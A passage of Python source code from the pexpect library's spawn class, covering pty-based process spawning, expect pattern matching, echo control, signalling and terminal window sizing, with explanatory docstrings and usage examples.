self.searchwindowsize = searchwindowsize
# Delay used before sending data to child. Time in seconds.
# Most Linux machines don't like this to be below 0.03 (30 ms).
self.delaybeforesend = 0.05
# Used by close() to give kernel time to update process status.
# Time in seconds.
self.delayafterclose = 0.1
# Used by terminate() to give kernel time to update process status.
# Time in seconds.
self.delayafterterminate = 0.1
self.softspace = False
self.name = '<' + repr(self) + '>'
self.closed = True
self.cwd = cwd
self.env = env
self.ignore_sighup = ignore_sighup
# This flags if we are running on irix
self.__irix_hack = (sys.platform.lower().find('irix') >= 0)
# Solaris uses internal __fork_pty(). All others use pty.fork().
if ((sys.platform.lower().find('solaris') >= 0)
or (sys.platform.lower().find('sunos5') >= 0)):
self.use_native_pty_fork = False
else:
self.use_native_pty_fork = True
# Support subclasses that do not use command or args.
if command is None:
self.command = None
self.args = None
self.name = '<pexpect factory incomplete>'
else:
self._spawn(command, args)
@staticmethod
def _coerce_expect_string(s):
if not isinstance(s, bytes):
return s.encode('ascii')
return s
@staticmethod
def _coerce_send_string(s):
if not isinstance(s, bytes):
return s.encode('utf-8')
return s
@staticmethod
def _coerce_read_string(s):
return s
def __del__(self):
'''This makes sure that no system resources are left open. Python only
garbage collects Python objects. OS file descriptors are not Python
objects, so they must be handled explicitly. If the child file
descriptor was opened outside of this class (passed to the constructor)
then this does not close it. '''
if not self.closed:
# It is possible for __del__ methods to execute during the
# teardown of the Python VM itself. Thus self.close() may
# trigger an exception because os.close may be None.
try:
self.close()
# which exception, shouldnt' we catch explicitly .. ?
except:
pass
def __str__(self):
'''This returns a human-readable string that represents the state of
the object. '''
s = []
s.append(repr(self))
s.append('version: ' + __version__)
s.append('command: ' + str(self.command))
s.append('args: %r' % (self.args,))
s.append('searcher: %r' % (self.searcher,))
s.append('buffer (last 100 chars): %r' % (self.buffer)[-100:],)
s.append('before (last 100 chars): %r' % (self.before)[-100:],)
s.append('after: %r' % (self.after,))
s.append('match: %r' % (self.match,))
s.append('match_index: ' + str(self.match_index))
s.append('exitstatus: ' + str(self.exitstatus))
s.append('flag_eof: ' + str(self.flag_eof))
s.append('pid: ' + str(self.pid))
s.append('child_fd: ' + str(self.child_fd))
s.append('closed: ' + str(self.closed))
s.append('timeout: ' + str(self.timeout))
s.append('delimiter: ' + str(self.delimiter))
s.append('logfile: ' + str(self.logfile))
s.append('logfile_read: ' + str(self.logfile_read))
s.append('logfile_send: ' + str(self.logfile_send))
s.append('maxread: ' + str(self.maxread))
s.append('ignorecase: ' + str(self.ignorecase))
s.append('searchwindowsize: ' + str(self.searchwindowsize))
s.append('delaybeforesend: ' + str(self.delaybeforesend))
s.append('delayafterclose: ' + str(self.delayafterclose))
s.append('delayafterterminate: ' + str(self.delayafterterminate))
return '\n'.join(s)
def _spawn(self, command, args=[]):
'''This starts the given command in a child process. This does all the
fork/exec type of stuff for a pty. This is called by __init__. If args
is empty then command will be parsed (split on spaces) and args will be
set to parsed arguments. '''
# The pid and child_fd of this object get set by this method.
# Note that it is difficult for this method to fail.
# You cannot detect if the child process cannot start.
# So the only way you can tell if the child process started
# or not is to try to read from the file descriptor. If you get
# EOF immediately then it means that the child is already dead.
# That may not necessarily be bad because you may have spawned a child
# that performs some task; creates no stdout output; and then dies.
# If command is an int type then it may represent a file descriptor.
if isinstance(command, type(0)):
raise ExceptionPexpect('Command is an int type. ' +
'If this is a file descriptor then maybe you want to ' +
'use fdpexpect.fdspawn which takes an existing ' +
'file descriptor instead of a command string.')
if not isinstance(args, type([])):
raise TypeError('The argument, args, must be a list.')
if args == []:
self.args = split_command_line(command)
self.command = self.args[0]
else:
# Make a shallow copy of the args list.
self.args = args[:]
self.args.insert(0, command)
self.command = command
command_with_path = which(self.command)
if command_with_path is None:
raise ExceptionPexpect('The command was not found or was not ' +
'executable: %s.' % self.command)
self.command = command_with_path
self.args[0] = self.command
self.name = '<' + ' '.join(self.args) + '>'
assert self.pid is None, 'The pid member must be None.'
assert self.command is not None, 'The command member must not be None.'
if self.use_native_pty_fork:
try:
self.pid, self.child_fd = pty.fork()
except OSError:
err = sys.exc_info()[1]
raise ExceptionPexpect('pty.fork() failed: ' + str(err))
else:
# Use internal __fork_pty
self.pid, self.child_fd = self.__fork_pty()
if self.pid == 0:
# Child
try:
# used by setwinsize()
self.child_fd = sys.stdout.fileno()
self.setwinsize(24, 80)
# which exception, shouldnt' we catch explicitly .. ?
except:
# Some platforms do not like setwinsize (Cygwin).
# This will cause problem when running applications that
# are very picky about window size.
# This is a serious limitation, but not a show stopper.
pass
# Do not allow child to inherit open file descriptors from parent.
max_fd = resource.getrlimit(resource.RLIMIT_NOFILE)[0]
for i in range(3, max_fd):
try:
os.close(i)
except OSError:
pass
if self.ignore_sighup:
signal.signal(signal.SIGHUP, signal.SIG_IGN)
if self.cwd is not None:
os.chdir(self.cwd)
if self.env is None:
os.execv(self.command, self.args)
else:
os.execvpe(self.command, self.args, self.env)
# Parent
self.terminated = False
self.closed = False
def __fork_pty(self):
'''This implements a substitute for the forkpty system call. This
should be more portable than the pty.fork() function. Specifically,
this should work on Solaris.
Modified 10.06.05 by Geoff Marshall: Implemented __fork_pty() method to
resolve the issue with Python's pty.fork() not supporting Solaris,
particularly ssh. Based on patch to posixmodule.c authored by Noah
Spurrier::
http://mail.python.org/pipermail/python-dev/2003-May/035281.html
'''
parent_fd, child_fd = os.openpty()
if parent_fd < 0 or child_fd < 0:
raise ExceptionPexpect("Could not open with os.openpty().")
pid = os.fork()
if pid < 0:
raise ExceptionPexpect("Failed os.fork().")
elif pid == 0:
# Child.
os.close(parent_fd)
self.__pty_make_controlling_tty(child_fd)
os.dup2(child_fd, 0)
os.dup2(child_fd, 1)
os.dup2(child_fd, 2)
if child_fd > 2:
os.close(child_fd)
else:
# Parent.
os.close(child_fd)
return pid, parent_fd
def __pty_make_controlling_tty(self, tty_fd):
'''This makes the pseudo-terminal the controlling tty. This should be
more portable than the pty.fork() function. Specifically, this should
work on Solaris. '''
child_name = os.ttyname(tty_fd)
# Disconnect from controlling tty. Harmless if not already connected.
try:
fd = os.open("/dev/tty", os.O_RDWR | os.O_NOCTTY)
if fd >= 0:
os.close(fd)
# which exception, shouldnt' we catch explicitly .. ?
except:
# Already disconnected. This happens if running inside cron.
pass
os.setsid()
# Verify we are disconnected from controlling tty
# by attempting to open it again.
try:
fd = os.open("/dev/tty", os.O_RDWR | os.O_NOCTTY)
if fd >= 0:
os.close(fd)
raise ExceptionPexpect('Failed to disconnect from ' +
'controlling tty. It is still possible to open /dev/tty.')
# which exception, shouldnt' we catch explicitly .. ?
except:
# Good! We are disconnected from a controlling tty.
pass
# Verify we can open child pty.
fd = os.open(child_name, os.O_RDWR)
if fd < 0:
raise ExceptionPexpect("Could not open child pty, " + child_name)
else:
os.close(fd)
# Verify we now have a controlling tty.
fd = os.open("/dev/tty", os.O_WRONLY)
if fd < 0:
raise ExceptionPexpect("Could not open controlling tty, /dev/tty")
else:
os.close(fd)
def fileno(self):
'''This returns the file descriptor of the pty for the child.
'''
return self.child_fd
def close(self, force=True):
'''This closes the connection with the child application. Note that
calling close() more than once is valid. This emulates standard Python
behavior with files. Set force to True if you want to make sure that
the child is terminated (SIGKILL is sent if the child ignores SIGHUP
and SIGINT). '''
if not self.closed:
self.flush()
os.close(self.child_fd)
# Give kernel time to update process status.
time.sleep(self.delayafterclose)
if self.isalive():
if not self.terminate(force):
raise ExceptionPexpect('Could not terminate the child.')
self.child_fd = -1
self.closed = True
#self.pid = None
def flush(self):
'''This does nothing. It is here to support the interface for a
File-like object. '''
pass
def isatty(self):
'''This returns True if the file descriptor is open and connected to a
tty(-like) device, else False. '''
return os.isatty(self.child_fd)
def waitnoecho(self, timeout=-1):
'''This waits until the terminal ECHO flag is set False. This returns
True if the echo mode is off. This returns False if the ECHO flag was
not set False before the timeout. This can be used to detect when the
child is waiting for a password. Usually a child application will turn
off echo mode when it is waiting for the user to enter a password. For
example, instead of expecting the "password:" prompt you can wait for
the child to set ECHO off::
p = pexpect.spawn('ssh [email protected]')
p.waitnoecho()
p.sendline(mypassword)
If timeout==-1 then this method will use the value in self.timeout.
If timeout==None then this method to block until ECHO flag is False.
'''
if timeout == -1:
timeout = self.timeout
if timeout is not None:
end_time = time.time() + timeout
while True:
if not self.getecho():
return True
if timeout < 0 and timeout is not None:
return False
if timeout is not None:
timeout = end_time - time.time()
time.sleep(0.1)
def getecho(self):
'''This returns the terminal echo mode. This returns True if echo is
on or False if echo is off. Child applications that are expecting you
to enter a password often set ECHO False. See waitnoecho(). '''
attr = termios.tcgetattr(self.child_fd)
if attr[3] & termios.ECHO:
return True
return False
def setecho(self, state):
'''This sets the terminal echo mode on or off. Note that anything the
child sent before the echo will be lost, so you should be sure that
your input buffer is empty before you call setecho(). For example, the
following will work as expected::
p = pexpect.spawn('cat') # Echo is on by default.
p.sendline('1234') # We expect see this twice from the child...
p.expect(['1234']) # ... once from the tty echo...
p.expect(['1234']) # ... and again from cat itself.
p.setecho(False) # Turn off tty echo
p.sendline('abcd') # We will set this only once (echoed by cat).
p.sendline('wxyz') # We will set this only once (echoed by cat)
p.expect(['abcd'])
p.expect(['wxyz'])
The following WILL NOT WORK because the lines sent before the setecho
will be lost::
p = pexpect.spawn('cat')
p.sendline('1234')
p.setecho(False) # Turn off tty echo
p.sendline('abcd') # We will set this only once (echoed by cat).
p.sendline('wxyz') # We will set this only once (echoed by cat)
p.expect(['1234'])
p.expect(['1234'])
p.expect(['abcd'])
p.expect(['wxyz'])
'''
self.child_fd
attr = termios.tcgetattr(self.child_fd)
if state:
attr[3] = attr[3] | termios.ECHO
else:
attr[3] = attr[3] & ~termios.ECHO
# I tried TCSADRAIN and TCSAFLUSH, but
# these were inconsistent and blocked on some platforms.
# TCSADRAIN would probably be ideal if it worked.
termios.tcsetattr(self.child_fd, termios.TCSANOW, attr)
def _log(self, s, direction):
if self.logfile is not None:
self.logfile.write(s)
self.logfile.flush()
second_log = self.logfile_send if (direction=='send') else self.logfile_read
if second_log is not None:
second_log.write(s)
second_log.flush()
def read_nonblocking(self, size=1, timeout=-1):
'''This reads at most size characters from the child application. It
includes a timeout. If the read does not complete within the timeout
period then a TIMEOUT exception is raised. If the end of file is read
then an EOF exception will be raised. If a log file was set using
setlog() then all data will also be written to the log file.
If timeout is None then the read may block indefinitely.
If timeout is -1 then the self.timeout value is used. If timeout is 0
then the child is polled and if there is no data immediately ready
then this will raise a TIMEOUT exception.
The timeout refers only to the amount of time to read at least one
character. This is not effected by the 'size' parameter, so if you call
read_nonblocking(size=100, timeout=30) and only one character is
available right away then one character will be returned immediately.
It will not wait for 30 seconds for another 99 characters to come in.
This is a wrapper around os.read(). It uses select.select() to
implement the timeout. '''
if self.closed:
raise ValueError('I/O operation on closed file.')
if timeout == -1:
timeout = self.timeout
# Note that some systems such as Solaris do not give an EOF when
# the child dies. In fact, you can still try to read
# from the child_fd -- it will block forever or until TIMEOUT.
# For this case, I test isalive() before doing any reading.
# If isalive() is false, then I pretend that this is the same as EOF.
if not self.isalive():
# timeout of 0 means "poll"
r, w, e = self.__select([self.child_fd], [], [], 0)
if not r:
self.flag_eof = True
raise EOF('End Of File (EOF). Braindead platform.')
elif self.__irix_hack:
# Irix takes a long time before it realizes a child was terminated.
# FIXME So does this mean Irix systems are forced to always have
# FIXME a 2 second delay when calling read_nonblocking? That sucks.
r, w, e = self.__select([self.child_fd], [], [], 2)
if not r and not self.isalive():
self.flag_eof = True
raise EOF('End Of File (EOF). Slow platform.')
r, w, e = self.__select([self.child_fd], [], [], timeout)
if not r:
if not self.isalive():
# Some platforms, such as Irix, will claim that their
# processes are alive; timeout on the select; and
# then finally admit that they are not alive.
self.flag_eof = True
raise EOF('End of File (EOF). Very slow platform.')
else:
raise TIMEOUT('Timeout exceeded.')
if self.child_fd in r:
try:
s = os.read(self.child_fd, size)
except OSError:
# Linux does this
self.flag_eof = True
raise EOF('End Of File (EOF). Exception style platform.')
if s == b'':
# BSD style
self.flag_eof = True
raise EOF('End Of File (EOF). Empty string style platform.')
s = self._coerce_read_string(s)
self._log(s, 'read')
return s
raise ExceptionPexpect('Reached an unexpected state.')
def read(self, size=-1):
'''This reads at most "size" bytes from the file (less if the read hits
EOF before obtaining size bytes). If the size argument is negative or
omitted, read all data until EOF is reached. The bytes are returned as
a string object. An empty string is returned when EOF is encountered
immediately. '''
if size == 0:
return self.string_type()
if size < 0:
# delimiter default is EOF
self.expect(self.delimiter)
return self.before
# I could have done this more directly by not using expect(), but
# I deliberately decided to couple read() to expect() so that
# I would catch any bugs early and ensure consistant behavior.
# It's a little less efficient, but there is less for me to
# worry about if I have to later modify read() or expect().
# Note, it's OK if size==-1 in the regex. That just means it
# will never match anything in which case we stop only on EOF.
cre = re.compile(self._coerce_expect_string('.{%d}' % size), re.DOTALL)
# delimiter default is EOF
index = self.expect([cre, self.delimiter])
if index == 0:
### FIXME self.before should be ''. Should I assert this?
return self.after
return self.before
def readline(self, size=-1):
'''This reads and returns one entire line. The newline at the end of
line is returned as part of the string, unless the file ends without a
newline. An empty string is returned if EOF is encountered immediately.
This looks for a newline as a CR/LF pair (\\r\\n) even on UNIX because
this is what the pseudotty device returns. So contrary to what you may
expect you will receive newlines as \\r\\n.
If the size argument is 0 then an empty string is returned. In all
other cases the size argument is ignored, which is not standard
behavior for a file-like object. '''
if size == 0:
return self.string_type()
# delimiter default is EOF
index = self.expect([b'\r\n', self.delimiter])
if index == 0:
return self.before + b'\r\n'
else:
return self.before
def __iter__(self):
'''This is to support iterators over a file-like object.
'''
return iter(self.readline, self.string_type())
def readlines(self, sizehint=-1):
'''This reads until EOF using readline() and returns a list containing
the lines thus read. The optional 'sizehint' argument is ignored.
Remember, because this reads until EOF that means the child
process should have closed its stdout. If you run this method on
a child that is still running with its stdout open then this
method will block until it timesout.'''
lines = []
while True:
line = self.readline()
if not line:
break
lines.append(line)
return lines
def write(self, s):
'''This is similar to send() except that there is no return value.
'''
self.send(s)
def writelines(self, sequence):
'''This calls write() for each element in the sequence. The sequence
can be any iterable object producing strings, typically a list of
strings. This does not add line separators. There is no return value.
'''
for s in sequence:
self.write(s)
def send(self, s):
'''Sends string ``s`` to the child process, returning the number of
bytes written. If a logfile is specified, a copy is written to that
log. '''
time.sleep(self.delaybeforesend)
s = self._coerce_send_string(s)
self._log(s, 'send')
return self._send(s)
def _send(self, s):
return os.write(self.child_fd, s)
def sendline(self, s=''):
'''Wraps send(), sending string ``s`` to child process, with os.linesep
automatically appended. Returns number of bytes written. '''
n = self.send(s)
n = n + self.send(self.linesep)
return n
def sendcontrol(self, char):
'''Helper method that wraps send() with mnemonic access for sending control
character to the child (such as Ctrl-C or Ctrl-D). For example, to send
Ctrl-G (ASCII 7, bell, '\a')::
child.sendcontrol('g')
See also, sendintr() and sendeof().
'''
char = char.lower()
a = ord(char)
if a >= 97 and a <= 122:
a = a - ord('a') + 1
return self.send(self._chr(a))
d = {'@': 0, '`': 0,
'[': 27, '{': 27,
'\\': 28, '|': 28,
']': 29, '}': 29,
'^': 30, '~': 30,
'_': 31,
'?': 127}
if char not in d:
return 0
return self.send(self._chr(d[char]))
def sendeof(self):
'''This sends an EOF to the child. This sends a character which causes
the pending parent output buffer to be sent to the waiting child
program without waiting for end-of-line. If it is the first character
of the line, the read() in the user program returns 0, which signifies
end-of-file. This means to work as expected a sendeof() has to be
called at the beginning of a line. This method does not send a newline.
It is the responsibility of the caller to ensure the eof is sent at the
beginning of a line. '''
### Hmmm... how do I send an EOF?
###C if ((m = write(pty, *buf, p - *buf)) < 0)
###C return (errno == EWOULDBLOCK) ? n : -1;
#fd = sys.stdin.fileno()
#old = termios.tcgetattr(fd) # remember current state
#attr = termios.tcgetattr(fd)
#attr[3] = attr[3] | termios.ICANON # ICANON must be set to see EOF
#try: # use try/finally to ensure state gets restored
# termios.tcsetattr(fd, termios.TCSADRAIN, attr)
# if hasattr(termios, 'CEOF'):
# os.write(self.child_fd, '%c' % termios.CEOF)
# else:
# # Silly platform does not define CEOF so assume CTRL-D
# os.write(self.child_fd, '%c' % 4)
#finally: # restore state
# termios.tcsetattr(fd, termios.TCSADRAIN, old)
if hasattr(termios, 'VEOF'):
char = ord(termios.tcgetattr(self.child_fd)[6][termios.VEOF])
else:
# platform does not define VEOF so assume CTRL-D
char = 4
self.send(self._chr(char))
def sendintr(self):
'''This sends a SIGINT to the child. It does not require
the SIGINT to be the first character on a line. '''
if hasattr(termios, 'VINTR'):
char = ord(termios.tcgetattr(self.child_fd)[6][termios.VINTR])
else:
# platform does not define VINTR so assume CTRL-C
char = 3
self.send(self._chr(char))
def eof(self):
'''This returns True if the EOF exception was ever raised.
'''
return self.flag_eof
def terminate(self, force=False):
'''This forces a child process to terminate. It starts nicely with
SIGHUP and SIGINT. If "force" is True then moves onto SIGKILL. This
returns True if the child was terminated. This returns False if the
child could not be terminated. '''
if not self.isalive():
return True
try:
self.kill(signal.SIGHUP)
time.sleep(self.delayafterterminate)
if not self.isalive():
return True
self.kill(signal.SIGCONT)
time.sleep(self.delayafterterminate)
if not self.isalive():
return True
self.kill(signal.SIGINT)
time.sleep(self.delayafterterminate)
if not self.isalive():
return True
if force:
self.kill(signal.SIGKILL)
time.sleep(self.delayafterterminate)
if not self.isalive():
return True
else:
return False
return False
except OSError:
# I think there are kernel timing issues that sometimes cause
# this to happen. I think isalive() reports True, but the
# process is dead to the kernel.
# Make one last attempt to see if the kernel is up to date.
time.sleep(self.delayafterterminate)
if not self.isalive():
return True
else:
return False
def wait(self):
'''This waits until the child exits. This is a blocking call. This will
not read any data from the child, so this will block forever if the
child has unread output and has terminated. In other words, the child
may have printed output then called exit(), but, the child is
technically still alive until its output is read by the parent. '''
if self.isalive():
pid, status = os.waitpid(self.pid, 0)
else:
raise ExceptionPexpect('Cannot wait for dead child process.')
self.exitstatus = os.WEXITSTATUS(status)
if os.WIFEXITED(status):
self.status = status
self.exitstatus = os.WEXITSTATUS(status)
self.signalstatus = None
self.terminated = True
elif os.WIFSIGNALED(status):
self.status = status
self.exitstatus = None
self.signalstatus = os.WTERMSIG(status)
self.terminated = True
elif os.WIFSTOPPED(status):
# You can't call wait() on a child process in the stopped state.
raise ExceptionPexpect('Called wait() on a stopped child ' +
'process. This is not supported. Is some other ' +
'process attempting job control with our child pid?')
return self.exitstatus
def isalive(self):
'''This tests if the child process is running or not. This is
non-blocking. If the child was terminated then this will read the
exitstatus or signalstatus of the child. This returns True if the child
process appears to be running or False if not. It can take literally
SECONDS for Solaris to return the right status. '''
if self.terminated:
return False
if self.flag_eof:
# This is for Linux, which requires the blocking form
# of waitpid to # get status of a defunct process.
# This is super-lame. The flag_eof would have been set
# in read_nonblocking(), so this should be safe.
waitpid_options = 0
else:
waitpid_options = os.WNOHANG
try:
pid, status = os.waitpid(self.pid, waitpid_options)
except OSError:
err = sys.exc_info()[1]
# No child processes
if err.errno == errno.ECHILD:
raise ExceptionPexpect('isalive() encountered condition ' +
'where "terminated" is 0, but there was no child ' +
'process. Did someone else call waitpid() ' +
'on our process?')
else:
raise err
# I have to do this twice for Solaris.
# I can't even believe that I figured this out...
# If waitpid() returns 0 it means that no child process
# wishes to report, and the value of status is undefined.
if pid == 0:
try:
### os.WNOHANG) # Solaris!
pid, status = os.waitpid(self.pid, waitpid_options)
except OSError as e:
# This should never happen...
if e.errno == errno.ECHILD:
raise ExceptionPexpect('isalive() encountered condition ' +
'that should never happen. There was no child ' +
'process. Did someone else call waitpid() ' +
'on our process?')
else:
raise
# If pid is still 0 after two calls to waitpid() then the process
# really is alive. This seems to work on all platforms, except for
# Irix which seems to require a blocking call on waitpid or select,
# so I let read_nonblocking take care of this situation
# (unfortunately, this requires waiting through the timeout).
if pid == 0:
return True
if pid == 0:
return True
if os.WIFEXITED(status):
self.status = status
self.exitstatus = os.WEXITSTATUS(status)
self.signalstatus = None
self.terminated = True
elif os.WIFSIGNALED(status):
self.status = status
self.exitstatus = None
self.signalstatus = os.WTERMSIG(status)
self.terminated = True
elif os.WIFSTOPPED(status):
raise ExceptionPexpect('isalive() encountered condition ' +
'where child process is stopped. This is not ' +
'supported. Is some other process attempting ' +
'job control with our child pid?')
return False
def kill(self, sig):
'''This sends the given signal to the child application. In keeping
with UNIX tradition it has a misleading name. It does not necessarily
kill the child unless you send the right signal. '''
# Same as os.kill, but the pid is given for you.
if self.isalive():
os.kill(self.pid, sig)
def _pattern_type_err(self, pattern):
raise TypeError('got {badtype} ({badobj!r}) as pattern, must be one'
' of: {goodtypes}, pexpect.EOF, pexpect.TIMEOUT'\
.format(badtype=type(pattern),
badobj=pattern,
goodtypes=', '.join([str(ast)\
for ast in self.allowed_string_types])
)
)
def compile_pattern_list(self, patterns):
'''This compiles a pattern-string or a list of pattern-strings.
Patterns must be a StringType, EOF, TIMEOUT, SRE_Pattern, or a list of
those. Patterns may also be None which results in an empty list (you
might do this if waiting for an EOF or TIMEOUT condition without
expecting any pattern).
This is used by expect() when calling expect_list(). Thus expect() is
nothing more than::
cpl = self.compile_pattern_list(pl)
return self.expect_list(cpl, timeout)
If you are using expect() within a loop it may be more
efficient to compile the patterns first and then call expect_list().
This avoid calls in a loop to compile_pattern_list()::
cpl = self.compile_pattern_list(my_pattern)
while some_condition:
...
i = self.expect_list(clp, timeout)
...
'''
if patterns is None:
return []
if not isinstance(patterns, list):
patterns = [patterns]
# Allow dot to match \n
compile_flags = re.DOTALL
if self.ignorecase:
compile_flags = compile_flags | re.IGNORECASE
compiled_pattern_list = []
for idx, p in enumerate(patterns):
if isinstance(p, self.allowed_string_types):
p = self._coerce_expect_string(p)
compiled_pattern_list.append(re.compile(p, compile_flags))
elif p is EOF:
compiled_pattern_list.append(EOF)
elif p is TIMEOUT:
compiled_pattern_list.append(TIMEOUT)
elif isinstance(p, type(re.compile(''))):
compiled_pattern_list.append(p)
else:
self._pattern_type_err(p)
return compiled_pattern_list
def expect(self, pattern, timeout=-1, searchwindowsize=-1):
'''This seeks through the stream until a pattern is matched. The
pattern is overloaded and may take several types. The pattern can be a
StringType, EOF, a compiled re, or a list of any of those types.
Strings will be compiled to re types. This returns the index into the
pattern list. If the pattern was not a list this returns index 0 on a
successful match. This may raise exceptions for EOF or TIMEOUT. To
avoid the EOF or TIMEOUT exceptions add EOF or TIMEOUT to the pattern
list. That will cause expect to match an EOF or TIMEOUT condition
instead of raising an exception.
If you pass a list of patterns and more than one matches, the first
match in the stream is chosen. If more than one pattern matches at that
point, the leftmost in the pattern list is chosen. For example::
# the input is 'foobar'
index = p.expect(['bar', 'foo', 'foobar'])
# returns 1('foo') even though 'foobar' is a "better" match
Please note, however, that buffering can affect this behavior, since
input arrives in unpredictable chunks. For example::
# the input is 'foobar'
index = p.expect(['foobar', 'foo'])
# returns 0('foobar') if all input is available at once,
# but returs 1('foo') if parts of the final 'bar' arrive late
After a match is found the instance attributes 'before', 'after' and
'match' will be set. You can see all the data read before the match in
'before'. You can see the data that was matched in 'after'. The
re.MatchObject used in the re match will be in 'match'. If an error
occurred then 'before' will be set to all the data read so far and
'after' and 'match' will be None.
If timeout is -1 then timeout will be set to the self.timeout value.
A list entry may be EOF or TIMEOUT instead of a string. This will
catch these exceptions and return the index of the list entry instead
of raising the exception. The attribute 'after' will be set to the
exception type. The attribute 'match' will be None. This allows you to
write code like this::
index = p.expect(['good', 'bad', pexpect.EOF, pexpect.TIMEOUT])
if index == 0:
do_something()
elif index == 1:
do_something_else()
elif index == 2:
do_some_other_thing()
elif index == 3:
do_something_completely_different()
instead of code like this::
try:
index = p.expect(['good', 'bad'])
if index == 0:
do_something()
elif index == 1:
do_something_else()
except EOF:
do_some_other_thing()
except TIMEOUT:
do_something_completely_different()
These two forms are equivalent. It all depends on what you want. You
can also just expect the EOF if you are waiting for all output of a
child to finish. For example::
p = pexpect.spawn('/bin/ls')
p.expect(pexpect.EOF)
print p.before
If you are trying to optimize for speed then see expect_list().
'''
compiled_pattern_list = self.compile_pattern_list(pattern)
return self.expect_list(compiled_pattern_list,
timeout, searchwindowsize)
def expect_list(self, pattern_list, timeout=-1, searchwindowsize=-1):
'''This takes a list of compiled regular expressions and returns the
index into the pattern_list that matched the child output. The list may
also contain EOF or TIMEOUT(which are not compiled regular
expressions). This method is similar to the expect() method except that
expect_list() does not recompile the pattern list on every call. This
may help if you are trying to optimize for speed, otherwise just use
the expect() method. This is called by expect(). If timeout==-1 then
the self.timeout value is used. If searchwindowsize==-1 then the
self.searchwindowsize value is used. '''
return self.expect_loop(searcher_re(pattern_list),
timeout, searchwindowsize)
def expect_exact(self, pattern_list, timeout=-1, searchwindowsize=-1):
'''This is similar to expect(), but uses plain string matching instead
of compiled regular expressions in 'pattern_list'. The 'pattern_list'
may be a string; a list or other sequence of strings; or TIMEOUT and
EOF.
This call might be faster than expect() for two reasons: string
searching is faster than RE matching and it is possible to limit the
search to just the end of the input buffer.
This method is also useful when you don't want to have to worry about
escaping regular expression characters that you want to match.'''
if (isinstance(pattern_list, self.allowed_string_types) or
pattern_list in (TIMEOUT, EOF)):
pattern_list = [pattern_list]
def prepare_pattern(pattern):
if pattern in (TIMEOUT, EOF):
return pattern
if isinstance(pattern, self.allowed_string_types):
return self._coerce_expect_string(pattern)
self._pattern_type_err(pattern)
try:
pattern_list = iter(pattern_list)
except TypeError:
self._pattern_type_err(pattern_list)
pattern_list = [prepare_pattern(p) for p in pattern_list]
return self.expect_loop(searcher_string(pattern_list),
timeout, searchwindowsize)
def expect_loop(self, searcher, timeout=-1, searchwindowsize=-1):
'''This is the common loop used inside expect. The 'searcher' should be
an instance of searcher_re or searcher_string, which describes how and
what to search for in the input.
See expect() for other arguments, return value and exceptions. '''
self.searcher = searcher
if timeout == -1:
timeout = self.timeout
if timeout is not None:
end_time = time.time() + timeout
if searchwindowsize == -1:
searchwindowsize = self.searchwindowsize
try:
incoming = self.buffer
freshlen = len(incoming)
while True:
# Keep reading until exception or return.
index = searcher.search(incoming, freshlen, searchwindowsize)
if index >= 0:
self.buffer = incoming[searcher.end:]
self.before = incoming[: searcher.start]
self.after = incoming[searcher.start: searcher.end]
self.match = searcher.match
self.match_index = index
return self.match_index
# No match at this point
if (timeout is not None) and (timeout < 0):
raise TIMEOUT('Timeout exceeded in expect_any().')
# Still have time left, so read more data
c = self.read_nonblocking(self.maxread, timeout)
freshlen = len(c)
time.sleep(0.0001)
incoming = incoming + c
if timeout is not None:
timeout = end_time - time.time()
except EOF:
err = sys.exc_info()[1]
self.buffer = self.string_type()
self.before = incoming
self.after = EOF
index = searcher.eof_index
if index >= 0:
self.match = EOF
self.match_index = index
return self.match_index
else:
self.match = None
self.match_index = None
raise EOF(str(err) + '\n' + str(self))
except TIMEOUT:
err = sys.exc_info()[1]
self.buffer = incoming
self.before = incoming
self.after = TIMEOUT
index = searcher.timeout_index
if index >= 0:
self.match = TIMEOUT
self.match_index = index
return self.match_index
else:
self.match = None
self.match_index = None
raise TIMEOUT(str(err) + '\n' + str(self))
except:
self.before = incoming
self.after = None
self.match = None
self.match_index = None
raise
def getwinsize(self):
'''This returns the terminal window size of the child tty. The return
value is a tuple of (rows, cols). '''
TIOCGWINSZ = getattr(termios, 'TIOCGWINSZ', 1074295912)
s = struct.pack('HHHH', 0, 0, 0, 0)
x = fcntl.ioctl(self.child_fd, TIOCGWINSZ, s)
return struct.unpack('HHHH', x)[0:2]
def setwinsize(self, rows, cols):
'''This sets the terminal window size of the child tty. This will cause
a SIGWINCH signal to be sent to the child. This does not change the
physical window size. It changes the size reported to TTY-aware
applications like vi or curses -- applications that respond to the
SIGWINCH signal. '''
# Check for buggy platforms. Some Python versions on some platforms
# (notably OSF1 Alpha and RedHat 7.1) truncate the value for
# termios.TIOCSWINSZ. It is not clear why this happens.
# These platforms don't seem to handle the signed int very well;
# yet other platforms like OpenBSD have a large negative value for
# TIOCSWINSZ and they don't have a truncate problem.
# Newer versions of Linux have totally different values for TIOCSWINSZ.
# Note that this fix is a hack.
TIOCSWINSZ = getattr(termios, 'TIOCSWINSZ', -2146929561)
if TIOCSWINSZ == 2148037735:
# Same bits, but with sign.
TIOCSWINSZ = -2146929561
# Note, assume ws_xpixel and ws_ypixel are zero.
s = struct.pack('HHHH', rows, cols, 0, 0)
fcntl.ioctl(self.fileno(), TIOCSWINSZ, s)
def interact(self, escape_character=chr(29),
input_filter=None, output_filter=None):
'''This gives control of the child process to the interactive user (the
human at the keyboard). Keystrokes are sent to the child process, and
the stdout and stderr output of the child process is printed. This
simply echos the child stdout and child stderr to the real stdout and
it echos the real stdin to the child stdin. When the user types the
escape_character this method will stop. The default for
escape_character is ^]. This should not be confused with ASCII 27 --
the ESC character. ASCII 29 was chosen for historical merit because
this is the character used by 'telnet' as the escape character. The
escape_character will not be sent to the child process.
You may pass in optional input and output filter functions. These
functions should take a string and return a string. The output_filter
will be passed all the output from the child process. The input_filter
will be passed all the keyboard input from the user. The input_filter
is run BEFORE the check for the escape_character.
Note that if you change the window size of the parent the SIGWINCH
signal will not be passed through to the child. If you want the child
window size to change when the parent's window size changes then do
something like the following example::
import pexpect, struct, fcntl, termios, signal, sys
def sigwinch_passthrough (sig, data):
s = struct.pack("HHHH", 0, 0, 0, 0)
a = struct.unpack('hhhh', fcntl.ioctl(sys.stdout.fileno(),
termios.TIOCGWINSZ , s))
global p
p.setwinsize(a[0],a[1])
# Note this 'p' global and used in sigwinch_passthrough.
p = pexpect.spawn('/bin/bash')
signal.signal(signal.SIGWINCH, sigwinch_passthrough)
p.interact()
'''
# Flush the buffer.
self.write_to_stdout(self.buffer)
self.stdout.flush()
self.buffer = self.string_type()
mode = tty.tcgetattr(self.STDIN_FILENO)
tty.setraw(self.STDIN_FILENO)
if PY3:
escape_character = escape_character.encode('latin-1')
try:
